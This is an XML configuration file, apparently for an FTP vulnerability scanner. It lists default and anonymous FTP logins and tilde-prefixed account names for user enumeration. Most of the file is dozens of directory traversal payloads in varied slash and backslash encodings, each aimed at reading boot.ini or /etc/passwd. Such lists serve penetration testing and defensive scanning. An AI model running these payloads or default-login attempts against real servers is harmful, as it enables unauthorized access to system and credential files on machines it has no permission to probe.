<?xml version="1.0" encoding="utf-8"?>
<Settings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <LogonUsers>
    <LogonUser>
      <User>ftp</User>
      <Password>ftp</Password>
    </LogonUser>
    <LogonUser>
      <User>anonymous</User>
      <Password>user@host.com</Password>
    </LogonUser>
  </LogonUsers>
  <EnumUsers>
    <string>~root</string>
    <string>~oracle</string>
    <string>~guest</string>
    <string>~bin</string>
    <string>~yourmum</string>
    <string>~woanware</string>
    <string>~wefkj3n3asdklawd</string>
  </EnumUsers>
  <FilePaths>
	<string>.rhosts</string>
	<string>c:\boot.ini</string>
	<string>boot.ini</string>
	<string>../../../boot.ini</string>
	<string>../../../../boot.ini</string>
	<string>../../../../../boot.ini</string>
	<string>../../../../../../boot.ini</string>
	<string>..\..\..\boot.ini</string>
	<string>..\..\..\..\boot.ini</string>
	<string>..\..\..\..\..\boot.ini</string>
	<string>..\..\..\..\..\..\boot.ini</string>
	<string>..//..//..//boot.ini</string>
	<string>..//..//..//..//boot.ini</string>
	<string>..//..//..//..//..//boot.ini</string>
	<string>..//..//..//..//..//..//boot.ini</string>
	<string>..///..///..///boot.ini</string>
	<string>..///..///..///..///boot.ini</string>
	<string>..///..///..///..///..///boot.ini</string>
	<string>..///..///..///..///..///..///boot.ini</string>
	<string>..\\..\\..\\boot.ini</string>
	<string>..\\..\\..\\..\\boot.ini</string>
	<string>..\\..\\..\\..\\..\\boot.ini</string>
	<string>..\\..\\..\\..\\..\\..\\boot.ini</string>
	<string>..\\\..\\\..\\\boot.ini</string>
	<string>..\\\..\\\..\\\..\\\boot.ini</string>
	<string>..\\\..\\\..\\\..\\\..\\\boot.ini</string>
	<string>..\\\..\\\..\\\..\\\..\\\..\\\boot.ini</string>
	<string>../\../\../\boot.ini</string>
	<string>../\../\../\../\boot.ini</string>
	<string>../\../\../\../\../\boot.ini</string>
	<string>../\../\../\../\../\../\boot.ini</string>
	<string>..\/..\/..\/boot.ini</string>
	<string>..\/..\/..\/..\/boot.ini</string>
	<string>..\/..\/..\/..\/..\/boot.ini</string>
	<string>..\/..\/..\/..\/..\/..\/boot.ini</string>
	<string>../\/../\/../\/boot.ini</string>
	<string>../\/../\/../\/../\/boot.ini</string>
	<string>../\/../\/../\/../\/../\/boot.ini</string>
	<string>../\/../\/../\/../\/../\/../\/boot.ini</string>
	<string>..\/\..\/\..\/\boot.ini</string>
	<string>..\/\..\/\..\/\..\/\boot.ini</string>
	<string>..\/\..\/\..\/\..\/\..\/\boot.ini</string>
	<string>..\/\..\/\..\/\..\/\..\/\..\/\boot.ini</string>
	<string>\../\../\../boot.ini</string>
	<string>\../\../\../\../boot.ini</string>
	<string>\../\../\../\../\../boot.ini</string>
	<string>\../\../\../\../\../\../boot.ini</string>
	<string>/..\/..\/..\boot.ini</string>
	<string>/..\/..\/..\/..\boot.ini</string>
	<string>/..\/..\/..\/..\/..\boot.ini</string>
	<string>/..\/..\/..\/..\/..\/..\boot.ini</string>
	<string>./.././.././../boot.ini</string>
	<string>./.././.././.././../boot.ini</string>
	<string>./.././.././.././.././../boot.ini</string>
	<string>./.././.././.././.././.././../boot.ini</string>
	<string>.\..\.\..\.\..\boot.ini</string>
	<string>.\..\.\..\.\..\.\..\boot.ini</string>
	<string>.\..\.\..\.\..\.\..\.\..\boot.ini</string>
	<string>.\..\.\..\.\..\.\..\.\..\.\..\boot.ini</string>
	<string>.//..//.//..//.//..//boot.ini</string>
	<string>.//..//.//..//.//..//.//..//boot.ini</string>
	<string>.//..//.//..//.//..//.//..//.//..//boot.ini</string>
	<string>.//..//.//..//.//..//.//..//.//..//.//..//boot.ini</string>
	<string>.\\..\\.\\..\\.\\..\\boot.ini</string>
	<string>.\\..\\.\\..\\.\\..\\.\\..\\boot.ini</string>
	<string>.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini</string>
	<string>.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\boot.ini</string>

 	<string>/etc/passwd</string>
	<string>../../../etc/passwd</string>
	<string>../../../../etc/passwd</string>
	<string>../../../../../etc/passwd</string>
	<string>../../../../../../etc/passwd</string>
	<string>..\..\..\etc\passwd</string>
	<string>..\..\..\..\etc\passwd</string>
	<string>..\..\..\..\..\etc\passwd</string>
	<string>..\..\..\..\..\..\etc\passwd</string>
	<string>..//..//..//etc//passwd</string>
	<string>..//..//..//..//etc//passwd</string>
	<string>..//..//..//..//..//etc//passwd</string>
	<string>..//..//..//..//..//..//etc//passwd</string>
	<string>..///..///..///etc//passwd</string>
	<string>..///..///..///..///etc///passwd</string>
	<string>..///..///..///..///..///etc///passwd</string>
	<string>..///..///..///..///..///..///etc///passwd</string>
	<string>..\\..\\..\\etc\\passwd</string>
	<string>..\\..\\..\\..\\etc\\passwd</string>
	<string>..\\..\\..\\..\\..\\etc\\passwd</string>
	<string>..\\..\\..\\..\\..\\..\\etc\\passwd</string>
	<string>..\\\..\\\..\\\etc\\\passwd</string>
	<string>..\\\..\\\..\\\..\\\etc\\\passwd</string>
	<string>..\\\..\\\..\\\..\\\..\\\etc\\\passwd</string>
	<string>..\\\..\\\..\\\..\\\..\\\..\\\etc\\\passwd</string>
	<string>../\../\../\etc/\passwd</string>
	<string>../\../\../\../\etc/\passwd</string>
	<string>../\../\../\../\../\etc/\passwd</string>
	<string>../\../\../\../\../\../\etc/\passwd</string>
	<string>..\/..\/..\/etc/\passwd</string>
	<string>..\/..\/..\/..\/etc/\passwd</string>
	<string>..\/..\/..\/..\/..\/etc/\passwd</string>
	<string>..\/..\/..\/..\/..\/..\/etc/\passwd</string>
	<string>../\/../\/../\/etc/\passwd</string>
	<string>../\/../\/../\/../\/etc/\passwd</string>
	<string>../\/../\/../\/../\/../\/etc/\passwd</string>
	<string>../\/../\/../\/../\/../\/../\/etc/\/passwd</string>
	<string>..\/\..\/\..\/\etc\/\passwd</string>
	<string>..\/\..\/\..\/\..\/\etc\/\passwd</string>
	<string>..\/\..\/\..\/\..\/\..\/\etc/passwd</string>
	<string>..\/\..\/\..\/\..\/\..\/\..\/\etc\/\passwd</string>
	<string>\../\../\../etc/\passwd</string>
	<string>\../\../\../\../\etc//passwd</string>
	<string>\../\../\../\../\../\etc/\passwd</string>
	<string>\../\../\../\../\../\../\etc/\passwd</string>
	<string>/..\/..\/../\etc/\passwd</string>
	<string>/..\/..\/..\/../\etc/\passwd</string>
	<string>/..\/..\/..\/..\/..\/etc\/passwd</string>
	<string>/..\/..\/..\/..\/..\/..\/etc\/passwd</string>
	<string>./.././.././../etc/./passwd</string>
	<string>./.././.././.././../etc/./passwd</string>
	<string>./.././.././.././.././../etc/./passwd</string>
	<string>./.././.././.././.././.././../etc/./passwd</string>
	<string>.\..\.\..\.\..\etc\.\passwd</string>
	<string>.\..\.\..\.\..\.\..\etc\.\passwd</string>
	<string>.\..\.\..\.\..\.\..\.\..\etc\.\passwd</string>
	<string>.\..\.\..\.\..\.\..\.\..\.\..\etc\.\passwd</string>
	<string>.//..//.//..//.//..//etc//passwd</string>
	<string>.//..//.//..//.//..//.//..//etc//passwd</string>
	<string>.//..//.//..//.//..//.//..//.//..//etc///passwd</string>
	<string>.//..//.//..//.//..//.//..//.//..//.//..//etc//passwd</string>
	<string>.\\..\\.\\..\\.\\..\\etc\\passwd</string>
	<string>.\\..\\.\\..\\.\\..\\.\\..\\etc\\passwd</string>
	<string>.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc\\passwd</string>
	<string>.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc\\passwd</string>
  </FilePaths>
</Settings>